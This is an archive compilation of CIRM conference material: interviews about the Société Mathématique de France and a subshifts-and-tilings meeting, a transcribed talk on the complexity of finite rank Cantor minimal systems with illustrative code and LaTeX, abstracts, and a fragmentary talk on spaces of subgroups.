Something people do not know, and I did not know it either, is that it is also the SMF that presents the CIRM's accounts to the auditor, because from a financial point of view the accounts of the SMF and of the CIRM are one and the same. So de facto we have to be very, very vigilant, but in any case the president of the SMF naturally places his trust in the director of the CIRM, who is the one in charge. So what does the CIRM bring us? As I said earlier, we can boast of reaching everyone from middle school pupils to Fields medallists who come here to attend conferences, so we have an absolutely colossal spectrum of dissemination of mathematics. We are always careful to keep making things evolve. I think of the work done by Patrick Foulon, which unfortunately, month after month, was trampled by the health crisis, but despite everything he tried to find ideas so that, financially, things would hold. Pascal replaced him on 1 September, and it is true that the freshness of a new director, because Patrick had been there for 10 years, brings other ideas; he perhaps has more distance, his nose is less in the handlebars, and in consultation with Patrick over July and August he changed the economic model of the CIRM in two ways, temporarily, though it will no doubt have a lasting effect: the way the famous free stays are allocated, and the responsiveness needed to hold conferences in smaller groups. The latter is made possible by what Patrick Foulon achieved during his two terms, namely the CIRM together with INSMI and Aix-Marseille Université building an absolutely magnificent new building. They now have the capacity to host smaller conferences in parallel with large ones, and we cannot wait to see a normal year, after this health crisis, to see what the CIRM can do. In 2019 it hosted, I believe it was a record, 4,900 participants, even though it was only just taking possession of all these buildings and had not exploited their full potential. So we can hope, and I hope it for the CIRM, for the 5,000 participants of a standard year.
|
Interview with Fabien Durand, mathematician at the Université de Picardie Jules Verne and president of the Société Mathématique de France since 1 July 2020.
|
10.5446/54141 (DOI)
|
I am a teacher-researcher at the Université de Picardie Jules Verne. I did my studies in Marseille; I lived for a while in the university halls of residence that used to be just near here. Then I went to Amiens, and I am currently president of the SMF. So much for the introductions. My research theme, what is it? It is what are called subshifts. For the expert audience: I have worked on Cantor sets, looking at transformations of the Cantor set. For me, there is no question of differentiating; I take very few derivatives, which is a little surprising. The tools we use are those of functional analysis, algebra, combinatorics and theoretical computer science, and computers too, because there are questions of decidability, of algorithms that handle certain objects. My name is Samuel Petite, I am a teacher-researcher at the Université de Picardie Jules Verne, the same university as Fabien. I did my thesis in Dijon, at the Université de Bourgogne; then I had a postdoc in Marseille, here, and then I got my position at the Université de Picardie. As for my research topics, they fall rather within the domain of dynamical systems and group actions, mainly on the Cantor set. The tools I use are much the same as Fabien's, with perhaps a little more algebra, a little more group theory, and ideas from the geometry of groups applied to these sets. We are used to organising this conference, which sits at the interface between theoretical computer science and dynamical systems. In this edition there is much more algebra, group theory and group actions, which we study systematically. It is a theme that has existed for a long time, but we now see the theoretical computer science community taking it up, via tilings, via what are called subshifts. So we wanted to organise a conference around these new aspects that are developing. That said, there is also room for talks on older, recurring subjects that are dear to us. And what we always want is to stay right at the interface, to bring in colleagues from computer science laboratories. So we are part of GDR networks, we circulate the information, and it works; each time, I think people are generally rather pleased. To add to what Fabien was saying, it actually goes both ways: it is enriching for the different domains, and in particular it also enriches computer science. Conversely, what is known in computer science brings new examples, a different perspective and other problems to the more group-theoretic, more algebraic side. So they enrich one another; it really is a confluence of themes that feed each other. They are also better at making beautiful pictures. Yes, the computer scientists. There is a graphical, aesthetic side that is always interesting. I must say that sometimes I invite people simply because I know they will tell me about interesting mathematics but also have beautiful illustrations, and mathematicians are perhaps less gifted at that. There are 24 of us staying at the CIRM, plus about ten Marseille colleagues who are here in person; let us say that each day there are about 30 or 35 of us here in this room.
And then, with 80 people joining by video, we have a total of, I think, 237 participants. The difficulty, it is true, is that since we stretch from Chile and Colorado all the way to Japan, the timetable is a little complicated. So in the afternoon we have our colleagues and friends from the United States, to the west of France, and in the morning we have the Iranian and Japanese colleagues. That is the small technical difficulty. It is going rather well, and the talks are always good. In 2009 we had done something called SubTile, and in between we organised a two-week meeting on the île d'Oléron on this theme, for which we brought in 250 people, if I remember correctly, though they were not all there the whole time. Otherwise, we and our colleagues regularly organise workshops at our respective universities, but broadly speaking it is good that, to mark the occasion, there are big events at regular intervals. And here I am speaking about the two of us, but other colleagues have of course organised such events too; we then come as participants. So roughly once every two years, at least, there is this type of event here at the CIRM. And we are lucky that one of the best teams in France, let us say, is in Marseille, so they have much more direct access, which means we have the good fortune to come here quite often.
|
This conference will gather researchers working on different topics such as combinatorics, computer science, probability, geometry, physics, quasicrystallography, ... but sharing a common interest: dynamical systems and more precisely subshifts, tilings and group actions. It will focus on algebraic and dynamical invariants such as group automorphisms, growth of symbolic complexity, Rauzy graphs, dimension groups, cohomology groups, full groups, dynamical spectrum, amenability, proximal pairs, ... With this conference we aim to spread out these invariants outside of their original domains and to deepen their connections with combinatorial and dynamical properties.
|
10.5446/54142 (DOI)
|
This talk is about some combinatorial and topological aspects of finite rank systems. I will start by recalling the basic definitions and some of the problems, then survey a few results, try to give some ideas on some special topics, and then ask a few questions that we have. Please, if you have any questions, just let me know. These basic definitions will probably appear many times, so I will go more or less quickly. I will take a finite alphabet, and here I will write the shift as the transformation S; I will not use the letter sigma because I will use that later. So capital S is the shift map, and I will be working with closed, shift-invariant subsets of the shift space, which I will denote generically by X. Sorry. Hi, Sebastián. I think all I see are two arrows chasing themselves; we don't see the slides. Ah, you don't see the slides. Okay. Maybe only the organizers see them. Okay, some people see them. I can see them on my computer, sorry about that. Just let me know if there is any problem. Okay. So we have this generic notation to denote the subshift, and as usual we say that a word, a finite sequence of symbols, appears in the subshift if you can see that word at some position of some point of your shift space. This is also probably well known: the language of words of length n is the set of all the finite words of length n that appear somewhere in X. And here is what will be one of the main objects we study: the complexity function. I apologize for my bad handwriting. This is the complexity function, which counts the number of words of length n appearing in the subshift. And just to recall, the topological entropy of the subshift, which I will write like that, is just the exponential growth rate of this function: it is the limit of the logarithm of this function divided by n. This quantity, the complexity function, has been studied by several authors, and in some restricted cases the complexity function tells us things about the system itself. So let me go to the next one. Some motivation for this complexity function is that there are complexity restrictions for systems expressed in terms of it. Probably the most well-known result is that your system is finite if and only if the complexity function is bounded. The next step is what I will call the non-superlinear complexity case, which is when the liminf of the complexity function divided by n is a finite number. This is the non-superlinear complexity condition, and it imposes several restrictions. Let me just start with the obvious one: systems with this condition have zero entropy. This is simply because the entropy is the exponential growth rate of the complexity, and with this growth condition it cannot be positive, so this is an almost immediate consequence. A less trivial consequence is that such systems have a finite number of ergodic measures. And here let me mention some names. This was first observed by Boshernitzan in, I think, 1984 or 1985, who showed that this number here, if it is finite, bounds the number of ergodic measures. Here the ergodic measures are the extreme points of the set of invariant measures.
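For readers following along without the slides, here is a LaTeX transcription of the objects the speaker describes; the notation X, S, p_X follows the talk, but the exact slide layout is a reconstruction rather than a verbatim copy.

```latex
\documentclass{article}
\usepackage{amsmath,amssymb}
\begin{document}
Let $A$ be a finite alphabet, $S\colon A^{\mathbb Z}\to A^{\mathbb Z}$ the shift map
$(Sx)_n=x_{n+1}$, and $X\subseteq A^{\mathbb Z}$ a subshift (closed and $S$-invariant).
With $\mathcal L_n(X)$ the set of words of length $n$ appearing in $X$,
\[
  p_X(n)=\#\mathcal L_n(X),\qquad
  h_{\mathrm{top}}(X)=\lim_{n\to\infty}\frac{\log p_X(n)}{n}.
\]
The non-superlinear complexity condition is
$\liminf_{n\to\infty} p_X(n)/n<\infty$; as stated in the talk, it forces
$h_{\mathrm{top}}(X)=0$ and (Boshernitzan) a finite number of ergodic
$S$-invariant measures.
\end{document}
```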
And this property has been studied in more detail very recently. Let me mention some recent results by Cyr and Kra, I think 2019, where they studied the number of ergodic measures and generic measures and give more precise bounds; I will just comment that this has been studied recently. To give a more complete list of references, there is also a result by Damron and Fickenscher, I'm sorry if I'm pronouncing it wrongly, this is 2017, and I think something related to their result will be in a talk tomorrow, so I advertise that talk about related results. There is also a recent paper by Dykstra and Pavlov, where they extend results to transitive subshifts; here everything is minimal, and they give more results for transitive systems. Okay, so this is just to say that systems with this condition have some rigidity properties, and I mean rigidity in a very vague sense: rigidity is what I am writing here, that they have zero entropy and a finite number of ergodic measures. And there is another property that these systems have, which I will call a restricted, or constrained, automorphism group. The automorphism group of the subshift is the group of all homeomorphisms that commute with the shift action. In these systems this group is constrained, and there are also very recent results about this question. To be more or less complete with the references, the first result in this direction was given by Salo and Törmä, I think in 2013, where they show, maybe I will write the condition here, that if you consider the automorphism group and you quotient by the group generated by the shift, this is finite. So this was first proved by Salo and Törmä in 2013 for some classes of substitutions. Then we have Cyr and Kra, and also myself with Fabien Durand, Alejandro Maass and Samuel Petite, where we show that non-superlinear complexity, so the condition that the liminf of the complexity over N is finite, implies that this object is finite: the automorphism group divided by the group generated by the shift is a finite group. Sorry, I forgot to mention that there is also, I think, a result by Coven and coauthors, let's say around the same time. Actually all these results use a condition, which I will call three prime, namely that this algebraic condition is a consequence of having a finite number of asymptotic components. And what is this? Two points in the subshift are asymptotic if they have equal values starting from some point. The typical picture is something like this: starting from some point the sequences coincide, and before that point they differ somewhere, probably we can think that they differ there, and after that they are equal. Being asymptotic is an equivalence relation, so you can talk about asymptotic components, and the property behind property three is that such systems have a finite number of asymptotic components. So, to summarize this slide, we have this complexity restriction and we want to understand what rigidity properties it implies; here I mentioned three or four of them. Any questions so far?
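As a reading aid (in my notation, not the speaker's slides), the rigidity consequences of non-superlinear complexity mentioned so far can be summarized as:

\[
\liminf_{n\to\infty}\frac{p_X(n)}{n}<\infty
\;\Longrightarrow\;
\begin{cases}
h_{\mathrm{top}}(X,S)=0,\\
\#\{\text{ergodic invariant measures}\}<\infty,\\
\operatorname{Aut}(X,S)/\langle S\rangle \ \text{is finite},\\
\#\{\text{non-trivial asymptotic classes}\}<\infty.
\end{cases}
\]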
Sorry, is it working? Yes, okay. When you say a finite number of asymptotic components, do you mean that a configuration asymptotic to itself does not count? Because if it did, then... Ah yes, yes, sorry: non-trivial asymptotic components. Non-trivial. Okay, so here I have some restrictions, let me go up: zero entropy, a finite number of ergodic measures, a constrained automorphism group and this finite number of non-trivial asymptotic components. So then we can ask whether all these restrictions are in fact more general, whether they appear under some topological assumption more general than this combinatorial property. If you look at restrictions one and two, zero entropy and a finite number of ergodic measures, one could guess a class of systems that one could try to understand, to see whether that class of systems is actually the one having all these restrictions that I mentioned here. And this is what we call the finite rank systems, and to define finite rank systems, which is the title, I will have to introduce briefly what is called the Bratteli-Vershik diagram. Probably there will be more talks about this, so I will spend a few minutes talking about this representation and then mention some results. As I mentioned before, the motivation was to understand all these restrictions that non-superlinear complexity gives and to see whether there is a more general class, maybe defined not in combinatorial terms as having non-superlinear complexity, that also has all those rigidity properties; that will be the class of finite rank systems that I will introduce in a few minutes. Okay, so to do that I have to tell you about Bratteli-Vershik diagrams. What is a Bratteli-Vershik diagram? It is an infinite graph where you put vertices in different levels, and you can connect a level with the next one and with nothing else. So you put together all vertices in a given level, you have an infinite graph like this, and the assumption is that you have one special vertex which is the root of the diagram. So I have vertices and edges between levels, and that is basically what a Bratteli diagram is. Between two levels, and in principle I should index them all differently, but to lighten the notation I will just write 1, 2, 3, etc., these are what are called levels: you have in one level a set of vertices and in the next level you have another set of vertices, different vertices, and you have some edges connecting them. That is the structure of a given level, and you have that for infinitely many levels, and this gives you a Bratteli diagram. The next thing concerning these structures is that for any given vertex you have an order on the edges that arrive at that vertex, the edges that are pointing up, say. Here I wrote the order 1, 2, 3, 4, and I will be considering this type of order just for convenience: I will order them from left to right, but this could be any order, it could be 1, 3, 2, etc.
It can be any order, but for the sake of the picture I will mainly use the order from left to right. Having done that, you can create what is called the Bratteli-Vershik map, which is as follows; I will not describe it formally, I will just give a few examples and let's hope things will be clear. Given this Bratteli diagram you can associate to it the set of all infinite paths; when I say paths, I mean you read the edges of this graph, this is an infinite path. And we can define the Bratteli-Vershik map as the successor map. I will give this example here, and let's see if it is clear; this is actually the easiest example one can imagine. We have one vertex at each level, and we connect it with two edges to the next one; this continues, I just drew a portion of it, and here I am drawing one path, this one in green. The successor map works like this: I look down until I find something that is not maximal. Here I am also considering the order from left to right, so this edge is smaller than this one; remember that at each vertex I had an order that allows me to compare the edges arriving at that vertex. So if we look at this path in green, the rule is: I look down until I find an edge that is not maximal. Here, if I start looking down, I will find this edge that is not maximal, I mark it, and I move it to the next one in the order I had. Then I erase everything I had above, and to redraw what I had there I come back with the minimal path, so I choose at each step the minimal edge that allows me to come back. That is the successor map. If we think of this as a sequence of zeros and ones, where say the edge on the left is a zero and the one on the right is a one, what we have done here, let me go back, is that the sequence one, zero, zero, something went to zero, one, zero. So this can be seen as adding one in the dyadic group: I add one to the first coordinate and I keep the, how is it called, I forgot the name in English, the carry, yes: this one becomes zero, I keep the carry, I put it in the next coordinate, and I continue like that. If you have never looked at this kind of dynamics, then maybe you are asking yourself what happens if I never find something that is not maximal; well, in that case you send that path to the path where everything is minimal, and of course this is well defined if there is only one maximal and one minimal path. This is just to give a taste of what the dynamics of this kind of map is. This example here is what is called an odometer, or adding machine: you have a group operation and what the successor dynamics is doing is adding some fixed element. What is particular about the odometer is that at each level you have one vertex, and actually that is what characterizes the odometers in this context.
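As a concrete illustration of this "adding one with carry" description (my own sketch, not code from the talk), here is the successor map of the dyadic odometer acting on a finite prefix of a 0/1 path; the all-maximal case is sent to the all-minimal path, as just described.

def odometer_successor(path):
    """Successor (Vershik) map for the dyadic odometer.

    `path` is a list of 0/1 edge labels, read from the root downwards,
    where 0 is the minimal edge and 1 the maximal edge at each level.
    """
    new = list(path)
    for i, edge in enumerate(new):
        if edge == 0:            # first non-maximal edge found going down
            new[i] = 1           # move it to the next edge in the order
            for j in range(i):   # refill everything above with minimal edges
                new[j] = 0
            return new
    return [0] * len(new)        # all-maximal path goes to the all-minimal one

p = [1, 1, 0, 0, 1]              # read least-significant digit first: 1 + 2 + 16 = 19
for _ in range(4):
    print(p)
    p = odometer_successor(p)    # each step adds one in base 2 with carry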
Then I will just draw a few pictures so you can imagine what happens when you have a more complicated structure. Here the structure was quite simple, just one vertex at each level, but you can have much more complicated structures, and the dynamics is exactly the same, it is just more difficult to look at, but the idea is the same. So here, for instance, let's consider this path in green; of course this continues down, but I just drew a portion of it. The dynamics is: you go down until you find something that you can move, something that is not maximal. In this case, this is maximal, this is maximal, and this is not maximal, so I should be able to move that one; I mark it as non-maximal, then I move it there, and then I come back to the top following the minimal path. That is one iteration of the successor map, and if your graph is complicated enough you will have a complicated enough dynamics. That is what I wanted to say about these maps; any questions? If not, please let me know later if you have any question. So, after all these definitions, one could ask what is the class of systems that can be built like that, and here two important theorems are the following ones. Just to mention the condition that we will be using: the diagram is simple if you can connect any two vertices that are far enough apart in the diagram, and this is the condition to have minimal dynamics; minimal dynamics means that every orbit is dense in the space. A fundamental result in this context is a theorem from 1992 by Herman, Putnam and Skau, which shows that any minimal Cantor system can be represented in this way. Here a minimal Cantor system means a minimal topological system on a Cantor space. So this is a kind of universality, or representation, theorem: all minimal dynamics that happen on a Cantor space can be represented as I said before. So the class of systems we can treat with these diagrams is quite big, it is all minimal Cantor systems, and the definition we will be discussing next is the one of finite rank. A system has finite rank if I can represent it as previously, with a diagram where the number of vertices does not increase to infinity. Let me go back: here it could be that, as I go further down, the number of vertices goes to infinity, and this is a valid diagram, it represents some dynamics; but when this does not happen, or when you can represent the system in a way such that this does not happen, the system is called a finite rank system. And this class of systems starts to exhibit some rigidity properties. The first one is a theorem by Tomasz Downarowicz and Alejandro Maass from 2008 that says that if you have a system that can be represented with a diagram where the number of vertices is bounded, then it is either expansive, meaning a subshift, or an odometer, like the situation I drew in the beginning, where you have one vertex at each level and you are just adding a fixed element of a group. This is a dichotomy theorem that says everything in that class is either a subshift or an equicontinuous system, a rotation on a compact abelian group. So here we have a first restriction on this class, because, if you were wondering, all subshifts live on a Cantor space, but on a Cantor space you can also have things that are not expansive, so not everything is a subshift. So this is a very first result.
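Before moving on, here is a hedged Python sketch (my own; the two-vertex diagram data is made up purely for illustration, and the all-maximal convention is a simplification for finite prefixes) of the successor map described above for a general ordered Bratteli diagram: go down to the first non-maximal edge, move it to the next edge with the same target vertex, and refill everything above with minimal edges.

# diagram[n][v] is the ordered list (minimal first) of incoming edges at vertex v
# of level n, each edge given by its source vertex at level n-1.
# Level 0 consists of the single root vertex 0.
diagram = {
    1: {0: [0, 0], 1: [0]},
    2: {0: [0, 1], 1: [0, 1, 1]},
    3: {0: [0, 1], 1: [0, 0, 1]},
}

def minimal_path_into(level, vertex):
    """Minimal finite path from the root down to `vertex` at `level`."""
    path, v = [], vertex
    for n in range(level, 0, -1):
        path.append((v, 0))                 # take the minimal incoming edge
        v = diagram[n][v][0]                # its source is the vertex one level up
    path.reverse()
    return path

def successor(path):
    """One step of the Vershik map on a finite path, a list of (vertex, edge_index)."""
    for n, (v, e) in enumerate(path, start=1):
        if e + 1 < len(diagram[n][v]):      # first non-maximal edge, going down
            new_source = diagram[n][v][e + 1]
            head = minimal_path_into(n - 1, new_source) if n > 1 else []
            return head + [(v, e + 1)] + path[n:]
    return minimal_path_into(len(path), path[-1][0])   # all-maximal case (convention)

p = minimal_path_into(3, 0)
for _ in range(5):
    print(p)
    p = successor(p)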
The theorem says that, more or less, we can focus on subshifts, because the other case is the odometer, and odometers are easier to understand. This class of systems was studied in detail in 2012 by Bezuglyi, Kwiatkowski, Medynets and Solomyak, and they exhibited some rigidity properties that I will briefly mention here. The first property they prove is that these systems have a finite number of ergodic measures, much as in the case of non-superlinear complexity; actually the number of ergodic measures is bounded by the rank. Maybe I did not mention it: the rank is the minimum number of vertices that you can use at each level to represent the system. So these systems have a finite number of ergodic measures, and they have zero entropy; what they showed is that they have zero entropy for any invariant measure, which of course implies, by the variational principle, that the topological entropy is zero. So we have these rigidity conditions in this class, which are the ones I mentioned in the beginning that hold under non-superlinear complexity. Here we can ask about the next restriction, and before presenting it I will put this class of systems in context with the non-superlinear complexity condition. This is part of a recent joint work with Fabien Durand, Alejandro Maass and Samuel Petite, where we show that the condition of non-superlinear complexity actually fits in this class, meaning that if a system has non-superlinear complexity then it has to be of finite rank, so it is of the form I described before. This gives an indirect proof that these systems have a finite number of ergodic measures, for instance, using the previous result I mentioned on this slide, but it is very indirect and not really optimal in terms of the bound. Then one can quickly ask whether this complexity condition characterizes the topological condition of finite rank, and this is false, actually already for rank two systems, that is, systems given by two vertices at each level: in such a system you may not have the complexity condition, there are examples where the complexity grows more than linearly, so superlinear complexity, but the system is of finite rank. Just to draw a picture: here we have the finite rank systems, and inside we have the non-superlinear ones, and these two classes are different. I mentioned in the beginning that the non-superlinear class satisfies some restrictions, like the entropy and the number of ergodic measures, which also hold for finite rank, but it also has the automorphism group restriction and the asymptotic pair restriction. So the first question one could ask is: are those conditions also satisfied for finite rank systems? Let me show you some questions; these are questions that we posed in the paper, but they are already solved. The first question is: does a minimal finite rank system have finitely many asymptotic components? This was solved by Bastián Espinoza, who is a graduate student of Alejandro and Fabien. Sorry, sorry, there is a question from Boris Solomyak, he is asking how fast the complexity can grow for finite rank. Oh yes, very good question; I actually wrote it down at the end, so maybe we can talk about that again, it is an open question I want to ask.
So this first question was already solved, I think in 2020, and this of course implies that the automorphism group of these systems is also constrained. There are some other topological consequences or questions, for instance: is every factor of a finite rank system also of finite rank? This was not clear at all, but it was also solved, by Bastián as well, and by Golestani and Hosseini, I'm sorry if I pronounce the names incorrectly, also in 2020. And this last one was solved recently, like last month, also by Bastián Espinoza: in terms of symbolic factors this class is also very restricted, it has finitely many factors up to topological conjugacy. I advertise that we have talks here on Thursday, and I think they will discuss these results in more detail, so I will just mention them. I have another question related to all these topological questions: one of the aspects I would like to treat in this class of systems is the complexity, and that is what we are going to discuss in more detail in what follows. What is the complexity of finite rank systems? We know it is zero entropy, but what are the possible complexities you can see, how can you control them, and if I give you an example, how can you estimate the complexity? To do so I will introduce a few notions, morphisms and S-adic subshifts, which are a bit more convenient to discuss this question. So here I will give a few more definitions. A morphism will be any map, call it tau, from an alphabet to another one, which you extend by concatenation of the images of the symbols: tau of a finite word is just the concatenation of the images of each letter. That is what I will call a morphism; I will not call it a substitution because the alphabets may be different, so I reserve the word substitution for the case of the same alphabet and call this a morphism. Given a sequence of morphisms, here I will restrict to positive morphisms, and positive means that if I write tau of a letter a, I will see some letters b1, b2, etc., and I want to see all of them: all letters appear in the image of each letter of the starting alphabet. This is the same as saying that, when you construct the matrix associated to the morphism, you have a positive matrix. And this is not a restrictive assumption, all the systems we are looking at can be considered with this condition; it is not restrictive, it is just to make things easier. So we have a sequence of positive morphisms where the alphabets might be different.
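As a quick illustration of these definitions (a toy example of mine, not one from the talk), here is a Python sketch of a morphism between two alphabets, extended to words by concatenation, together with the positivity check via the associated incidence matrix:

def apply(morphism, word):
    """Extend a letter-to-word morphism to finite words by concatenation."""
    return "".join(morphism[letter] for letter in word)

def is_positive(morphism, target_alphabet):
    """A morphism is positive if every target letter occurs in the image of
    every source letter (i.e. its incidence matrix has all entries > 0)."""
    return all(set(target_alphabet) <= set(image) for image in morphism.values())

# toy morphism tau: {a, b} -> words over {x, y}
tau = {"a": "xyx", "b": "yxxy"}
print(apply(tau, "abba"))        # -> "xyxyxxyyxxyxyx"
print(is_positive(tau, "xy"))    # -> True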
Having that sequence of morphisms, we can build what is called the S-adic subshift associated to the sequence, which is given by the following condition: a point is in the subshift if the finite words of this point can be obtained by iterating some letter from far away. Let me try to do the picture. I have a sequence of morphisms, each going from one alphabet to the previous one, down to tau zero; here I have my original alphabet A0, an alphabet A1, and you have some way to send letters of one into words of the previous one. A point of the subshift belongs to the first alphabet to the power Z, and the point is in there if, when I take any subword of it, this subword comes from iterating some letter of some alphabet, say A_k, through all the morphisms: when you do that you obtain a word that contains this finite word. Another way to say it is that you start iterating the morphisms from further and further away, and the limit points you get are the points of the subshift. So these are like a generalization of substitutions, but you allow the alphabets and the morphisms to change at every step; this is a way to build what is called an S-adic subshift. And what is actually proved in the recent results I mentioned is that this is intimately related to finite rank systems. The way to relate this class with the finite rank systems is that finite rank systems are exactly the systems where you can control the size of the alphabets: here the alphabets can grow to infinity, but if you restrict to morphisms where the alphabets do not grow to infinity, then you actually get the same class, the finite rank systems. This will be explained in detail, I think, in the talks on Thursday, because it is a theorem, it is not trivial; probably one can expect this type of result, but there are some technical things to do in the middle. Okay, so the next question is: if I give you the sequence of morphisms, how can you compute the complexity, or is there any way to estimate it? I will spend the remaining minutes of my talk on this: how to estimate the complexity when I give you an example, or in some classes, and so on. Of course, there are some known cases. The substitutive case is when all the morphisms are equal to one given morphism, so there is only one morphism that you repeat infinitely many times, and in this case the complexity is sublinear, meaning that p of n is bounded by a constant times n. Another class that is well studied in symbolic dynamics is the linearly recurrent subshifts; I will not give the original definition, but this is when the morphisms come from a finite set of morphisms, and in this case the complexity is also sublinear. So it is a finite set of morphisms from which you choose how you iterate. And then there is the finite rank case, where you can ask what complexities can appear; the only obvious restriction is that it has zero entropy. So what we tried to develop were some ideas to compute the complexity in some examples or in some classes, and I will mention some of the tools we found, or tried to create, to compute the complexity. Here everything I am talking about is minimal and the morphisms are positive. To understand the complexity we will have to look at these quantities: for a morphism, let us denote with the double bar the maximal length of the image of a letter. So you take your letters a, b, c, say, you write down the substitution, and you may have that some letters give you a very long word while some other letters give you a very short word; I will write with this symbol the longest length and with this other symbol the shortest. We will see that these two quantities are behind the complexity: if you have a morphism where these two things are very different, you can achieve very non-trivial, high complexities.
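To make the S-adic construction and these length quantities concrete, here is a hedged Python sketch (with toy morphisms of my own choosing, here over the same two-letter alphabet at every level) that iterates a sequence of morphisms from some level down to level 0, producing long words whose factors approximate the language of the S-adic subshift, and that prints the maximal and minimal image lengths of each morphism.

def apply(morphism, word):
    """Extend a letter-to-word morphism to words by concatenation."""
    return "".join(morphism[letter] for letter in word)

def generate(morphisms, level, letter):
    """Compute tau_0(tau_1(...tau_level(letter)...)); the factors of the
    resulting word approximate the language of the S-adic subshift."""
    word = letter
    for tau in reversed(morphisms[: level + 1]):
        word = apply(tau, word)
    return word

def max_min_lengths(tau):
    """The two quantities from the talk: longest and shortest image length."""
    lengths = [len(v) for v in tau.values()]
    return max(lengths), min(lengths)

# a toy sequence of positive morphisms, alternating between two of them
# (so this particular example is in fact linearly recurrent)
tau_even = {"a": "ab", "b": "aab"}
tau_odd = {"a": "ba", "b": "abb"}
morphisms = [tau_even if n % 2 == 0 else tau_odd for n in range(8)]

for n, tau in enumerate(morphisms[:2]):
    print("tau", n, "max/min image length:", max_min_lengths(tau))
print(generate(morphisms, 5, "a")[:60])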
So here is the first tool to understand the complexity, what we call the repetition complexity. For the definition I will just show how to compute it. Suppose that you have a morphism that sends a letter to, say, a b c a b. What this quantity means is that, for each letter, you count how many times you change letter as you read its image: I start counting at one because I am using a letter, then here I change the letter, so I add one, here I change to another letter, I add one again; well, this is a bad example, it does not illustrate what is happening, so let us say that the image has many b's in the middle and then an a: while I am not changing the letter I do not add anything, and each time I change the letter I add one. When I do this I count, say, one, two, three, four, five, six, and I do that for the image of every letter, so b will give me something, say seven, and I add all those quantities. This is what we call the repetition complexity: how many times you need to change the letter inside the images of the morphism. And this should be related to the complexity, because if you change letters too much you are somehow creating many words, and that is exactly what happens. This is a computation that I will just write in a rough form; it can be done much more precisely. The proposition with this quantity is the following: suppose you have an S-adic subshift; then you can bound the complexity at n, for large enough n, and this is not a precise bound but it will work to illustrate the result, by the maximum of the sizes of the alphabets, which of course is meaningful only when the alphabets remain bounded, multiplied by the limsup of this repetition quantity that I defined previously. So you compute how the morphisms change the letters, you multiply that by the maximum of the sizes of the alphabets, and this is the constant that goes with n. Of course these quantities can grow, but the statement is meaningful when they are bounded, because then it gives us information: if you have an S-adic subshift where we can bound these two things, then the system has sublinear complexity. These are quite strong conditions, but I included this here just to illustrate how to use the notion; it can be described much more precisely, and we can talk afterwards if you are interested.
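Here is a small Python sketch (my own reading of the counting rule just described, so the normalization may differ slightly from the talk) of this repetition quantity for a single morphism, together with the resulting rough bound constant.

def runs(word):
    """Number of maximal blocks of consecutive equal letters in `word`
    (equivalently, 1 + the number of positions where the letter changes)."""
    if not word:
        return 0
    return 1 + sum(1 for x, y in zip(word, word[1:]) if x != y)

def repetition_quantity(morphism):
    """Sum of `runs` over the images of all letters of the morphism."""
    return sum(runs(image) for image in morphism.values())

tau = {"a": "abcab", "b": "abbba", "c": "cab"}   # toy morphism
alphabet_size = len(tau)
R = repetition_quantity(tau)
print(R, "-> rough bound on p(n):", alphabet_size * R, "* n for large n")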
As a consequence of this result, using some results from strong orbit equivalence theory, one gets that any system of finite topological rank is strongly orbit equivalent to something of sublinear complexity. Let me just say it with words: that means that you can send orbits to orbits in a somehow continuous way, and this notion preserves, for instance, the set of invariant measures, and some other things, the dimension group of course. And this proposition gives, for instance, an alternative proof that finite rank systems have finitely many ergodic measures, because such a system is orbit equivalent to something of sublinear complexity; but of course there we lose the precise bound, which is just an observation. So this complexity notion allows us to compute some things, but there is actually a more precise notion that we described, which is the relative complexity of morphisms; this is somehow how the morphisms in the S-adic representation are related to each other. I think I have very few minutes, so I will probably skip that part; if you want to take a look at this we can talk afterwards. It is a more precise notion to compute the complexity: the previous one is easy to compute in examples but highly non-optimal for computing the complexity, while this one is a bit better for computing the complexity but might be more complicated in examples. Okay, I will skip this because I am running out of time. The consequence of these computations is that one can say when a system has zero entropy, and it has to do with the exponential growth of the alphabets compared to the length of the shortest image word in the sequence of morphisms; this is probably a folklore result, but we gave a very concise proof of it, and in particular finite rank systems have zero entropy. I also wanted to mention another consequence, that subquadratic complexity always holds when the alphabets have size two. Okay, since I ran out of time, let me go to the questions, which are probably more interesting. Here are a few questions that are still open; maybe the specialists, people who have worked more on finite rank systems, can say whether they make sense. The first one is whether you can control the complexity of a finite rank system in a polynomial way: can you find a degree that controls the complexity of a finite rank system polynomially, or maybe not, and give an example where you cannot do that? That is the first question; as I said previously, when the alphabets have size two you can do it. The second question is whether, in some subclass of systems, you can characterize having topological finite rank in terms of complexity: for instance, we do not know whether these conditions are equivalent in the Toeplitz class, maybe in the Toeplitz class having finite topological rank is the same as having non-superlinear complexity. There is some evidence that supports that, but I will not mention it; we can discuss it later if you have any questions. And then we have a variety of other questions. Okay, thank you, Sebastián, maybe we can pass to the questions. There is a question in the chat asking what can be said if the minimality condition is replaced by having a unique minimal subset, in particular in the result where non-superlinear complexity implies finite rank. I am not sure what happens if you drop minimality; probably you can say things, but I have not thought about it. Okay, there is another question, from Martin Lustig, in the chat: what about replacing, for subshifts, the Bratteli-Vershik rank by an S-adic rank, defined through the existence of an S-adic development which is everywhere growing, with bounded alphabet sizes, and perhaps also recognizable at each level? Yes, and you mean not necessarily positive, maybe. I think this question of Martin's is actually one of the things that will be discussed on Thursday; there is a recent paper by Bastián Espinoza where he addresses that question, if I am not mistaken, I think there is some development of that. Another question, from Dan Rust: what if the length of each morphism is bounded, what happens in this case, related to Martin's question? No, they do not need to be bounded, the sizes can grow, which will always happen if you telescope the diagram, if you look at it in the Bratteli-Vershik representation; but you are allowed to do that. Okay, so let's thank Sebastián.
|
I will comment on recent results concerning the topological properties of finite rank Cantor minimal systems. I will mention some ideas to estimate their word complexity and ask a few open problems.
|
10.5446/54143 (DOI)
|
[Large portions of this part of the recording are unintelligible; only fragments are transcribed.] ... I'm interested in the space Sub(G) of all subgroups of G. This, as you might know, can be seen as a compact space if you put on it just the product topology, so you can see it as a subspace of the set of all subsets of G. [unintelligible] ... that we give another definition. Assume that G acts on X ... [unintelligible] ... With Adrien we have been studying this notion a lot, and it turns out that ... [unintelligible] ... Okay, so, of course, every subgroup of it which contains that is still highly transitive. Now, why do I call these somewhat trivial examples? Because they are not really trivial, but they are very, very well understood somehow, this class of examples.
